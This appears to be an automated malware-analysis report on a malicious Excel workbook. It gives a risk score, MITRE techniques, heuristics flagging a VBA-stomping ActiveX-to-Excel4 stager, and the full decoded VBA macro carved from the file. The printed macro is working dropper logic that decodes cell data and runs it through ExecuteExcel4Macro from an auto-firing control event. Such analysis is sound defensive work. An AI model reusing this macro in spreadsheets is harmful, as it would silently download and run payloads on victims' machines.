MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristic indicates that a VBA ActiveX event launches decoded Excel4 macros, which is a common stager technique. The VBA script contains logic to decode and execute URLs, suggesting it downloads and executes a second-stage payload. The reconstructed URLs are the primary indicators of compromise.
Heuristics 2
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERThe compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas88751d0fe5dcba6af91578b21696d72c5dfd568ef10e68e66cf41a0f9fb94488 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1633 bytes |
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "clientnumber, 16, 0, MSForms, Frame"
Function hk()
hk = 65
End Function
Public Function nod(ByVal ye As String) As String
Dim Y As Long
Dim fd As String
Dim vf As String
For Y = 1 To Len(ye) Step 3
fd = Mid(ye, Y, 2): vf = vf & mailclient(fd)
Next Y
nod = vf
End Function
Function mailclient(Y As String) As String
If Len(Y) > 15 Then ExecuteExcel4Macro Y
mailclient = Chr(Val("&h" & Y))
End Function
Sub abstractus()
s = 78: Randomize
Dim vg As String, r As String, t As String
For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
k = k + nod(p)
Next
g = Split(k, "=")
bocos = Split(g(0), "!")
tangt = g(1)
vg = bocos(Int((54 - 0 + 1) * Rnd + 0))
poupss = Split(tangt, "!")
For Each f In poupss
u = ecotime(f, "?", vg)
mailclient (u)
Next
ActiveWorkbook.Close Len(s) - Len(s)
End Sub
Function ecotime(hj, sd, er As String)
ecotime = Replace(hj, sd, er)
End Function
Private Sub clientnumber_Layout()
dear = hk * 21: abstractus
End Sub
|
|||
vbaProject_00.bin0f567b77307151a83cbb47355f0a04bf8d29e1f2c06c81de0cb4e4a18158709f |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
emf_00.emf289f5a4af0055ab9abbe8cf110fe4e3827407560145dba39aa21028b266662a2 |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 1976 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.